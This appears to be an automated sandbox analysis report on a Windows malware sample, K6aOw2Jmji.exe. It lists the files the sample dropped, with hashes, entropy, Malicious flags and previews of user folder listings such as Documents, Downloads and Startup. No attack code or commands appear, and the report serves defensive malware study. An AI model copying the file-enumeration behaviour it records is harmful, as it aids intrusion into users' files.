                                                                                                                                                            Preview:Documents\...BPMLNOBVSB\...FENIVHOIKN\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NWTVCDUMOB\...UMMBDNEQBN\....HTAGVDFUIE.xlsx....KZWFNRXYKI.png....LTKMYBSEYZ.pdf....UMMBDNEQBN.docx....WUTJSCBCFX.jpg....ZBEDCJPBEY.mp3...VLZDGUKUTZ\....DVWHKMNFNN.png....HTAGVDFUIE.jpg....KATAXZVCPS.pdf....LTKMYBSEYZ.mp3....UMMBDNEQBN.xlsx....VLZDGUKUTZ.docx...WUTJSCBCFX\...desktop.ini...DVWHKMNFNN.png...HTAGVDFUIE.jpg...HTAGVDFUIE.xlsx...KATAXZVCPS.pdf...KZWFNRXYKI.png...LTKMYBSEYZ.mp3...LTKMYBSEYZ.pdf...UMMBDNEQBN.docx...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...WUTJSCBCFX.jpg...ZBEDCJPBEY.mp3..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):234
                                                                                                                                                            Entropy (8bit):5.260211293349667
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:3tSLKIyWyqjgqj0/EsSOLLuhOLXovsWr4rajMmy4k4q:QLKP3qcqw/F5LfL4vssmay
                                                                                                                                                            MD5:D6AEA3299903555A29B3BD5CE14064E3
                                                                                                                                                            SHA1:046A3E39EF0609A04C5E2C6EF96D5B37DF19FA58
                                                                                                                                                            SHA-256:1D512A5E11B4F9EEB96E43336B4BC29CE9D1AB329D11289539FDD2A04C835C25
                                                                                                                                                            SHA-512:29FBA29509E1D41C34512BB892A6DCB8AAB6927A41B8E28151EC8EAE83B2671B71D9F321269C3CBC9AEA8D8CD85F9DDCDA070BB8AB48558F9EC5075B3425A0D4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Downloads\...desktop.ini...DVWHKMNFNN.png...HTAGVDFUIE.jpg...HTAGVDFUIE.xlsx...KATAXZVCPS.pdf...KZWFNRXYKI.png...LTKMYBSEYZ.mp3...LTKMYBSEYZ.pdf...UMMBDNEQBN.docx...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...WUTJSCBCFX.jpg...ZBEDCJPBEY.mp3..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):25
                                                                                                                                                            Entropy (8bit):4.023465189601646
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1hiR8LKB:14R8LKB
                                                                                                                                                            MD5:966247EB3EE749E21597D73C4176BD52
                                                                                                                                                            SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                                                                                                                            SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                                                                                                                            SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:OneDrive\...desktop.ini..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):88
                                                                                                                                                            Entropy (8bit):4.450045114302317
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                                                                                                                            MD5:D430E8A326E3D75F5E49C40C111646E7
                                                                                                                                                            SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                                                                                                                            SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                                                                                                                            SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):24
                                                                                                                                                            Entropy (8bit):4.053508854797679
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:jgBLKB:j4LKB
                                                                                                                                                            MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                                                                                                                            SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                                                                                                                            SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                                                                                                                            SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Startup\...desktop.ini..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4152
                                                                                                                                                            Entropy (8bit):5.307295507027113
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:4jzcRPTmt6qESf2qNebQX3LHYwrbIGVEyKTZnrj4wq:BtbS+q4cnzDUKINq
                                                                                                                                                            MD5:D6CC29CA4D82B618CC72EEAAF4568A67
                                                                                                                                                            SHA1:E3CF64B6963E36FD24074BDD3FB8F06D47FBA319
                                                                                                                                                            SHA-256:FE4F5188CC754EE457459EC019378A0690F40731902B5B98071D2B48C848C76E
                                                                                                                                                            SHA-512:5CEF3B5081BD731136F762B4B680418BFE16A517D0FB2E73637353F6787C64D2FA6579767F13AF5D519CCEAE987F50EF767AE648992D2D95AD3581F383032D31
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):23
                                                                                                                                                            Entropy (8bit):3.7950885863977324
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:k+JrLKB:k+JrLKB
                                                                                                                                                            MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                                                                                                                            SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                                                                                                                            SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                                                                                                                            SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Videos\...desktop.ini..
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694985340190863
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                            MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                            SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                            SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                            SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                            Malicious:true
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.688284131239007
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                            MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                            SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                            SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                            SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                            Malicious:true
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694985340190863
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                            MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                            SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                            SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                            SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                            Malicious:true
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                            Malicious:true
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                            Malicious:true
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.688284131239007
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                            MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                            SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                            SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                            SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694985340190863
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                            MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                            SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                            SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                            SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Users\user\Desktop\K6aOw2Jmji.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.692693183518806
